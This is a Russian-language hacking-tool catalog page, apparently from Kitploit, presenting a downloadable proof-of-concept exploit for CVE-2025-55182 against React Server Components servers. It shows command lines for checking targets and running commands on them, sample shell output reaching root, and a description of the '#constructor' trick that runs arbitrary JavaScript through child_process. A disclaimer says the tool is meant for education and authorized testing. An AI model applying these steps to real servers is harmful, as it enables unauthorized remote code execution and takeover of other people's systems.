Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-PoC — PoC для CVE-2025-55182 | Kitploit
Инструменты/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

PoC для CVE-2025-55182

Репозиторий
19 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182-PoC

PoC для CVE-2025-55182

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

Юридический отказ от ответственности

Этот инструмент предоставлен только для образовательных целей и авторизованного тестирования безопасности. Использование этого инструмента для атаки на цели без предварительного взаимного согласия является незаконным. Разработчик не несет ответственности и не отвечает за любое неправомерное использование или ущерб, причиненный этой программой.

Требования

pip install requests

Использование

Вы можете запустить инструмент в одном из трех режимов: Проверка, Эксплойт или Интерактивная оболочка.

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

Пример

Скачать инструмент
root@kitploit:~
python3 poc.py -u http://target-site.com --check

Выполнение одной команды

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

Интерактивный режим оболочки

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

Как это работает

Проверка: Отправляет multipart-запрос, определяющий {} на индексе 1, и пытается получить доступ к ["$1:a:a"]. Незапатченные серверы падают (HTTP 500) при попытке доступа к свойству a от undefined. Запатченные серверы возвращают HTTP 200.

Эксплойт: Отправляет multipart-запрос с ссылкой на действительный Action ID, но добавляет #constructor. Это обманывает сериализатор, заставляя его вернуть конструктор Function, что позволяет передать произвольный JavaScript (child_process Node.js) для выполнения на сервере.